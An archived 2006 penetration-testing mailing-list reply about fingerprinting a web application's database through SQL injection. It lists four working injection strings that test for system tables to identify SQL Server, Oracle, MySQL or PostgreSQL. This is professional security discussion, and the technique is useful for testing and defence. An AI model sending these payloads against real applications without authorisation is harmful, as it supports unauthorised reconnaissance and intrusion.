Home page logo
/

pen-test logo Penetration Testing mailing list archives

RE: SQL injection (or not?)
From: Tonnerre Lombard <tonnerre.lombard () sygroup ch>
Date: Thu, 10 Aug 2006 06:31:08 +0200

Salut,

On Wed, 2006-08-09 at 12:01 +0200, Isidro Ramon Labrador Rodriguez
wrote:
Parameter=[valid value]' and exists(select * from sysobjects) and 'a'='a

If it returns a valid value the database is SQL Server


Parameter=[valid value]' and exists(select * from user_tables) and
'a'='a 
 
If it returns a valid value the database is Oracle


Parameter=[valid value]' and exists(select * from mysql.user) and 'a'='a

 
If it returns a valid value the database is MySQL

Parameter=[valid value]' and exists(select * from pg_shadow) and 'a'='a

should tell you it's PostgreSQL.

                                Tonnerre
-- 
SyGroup GmbH
Tonnerre Lombard

Loesungen mit System
Tel:+41 61 333 80 33    Roeschenzerstrasse 9
Fax:+41 61 383 14 67    4153 Reinach BL
Web:www.sygroup.ch      tonnerre.lombard () sygroup ch

Attachment: signature.asc
Description: This is a digitally signed message part


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]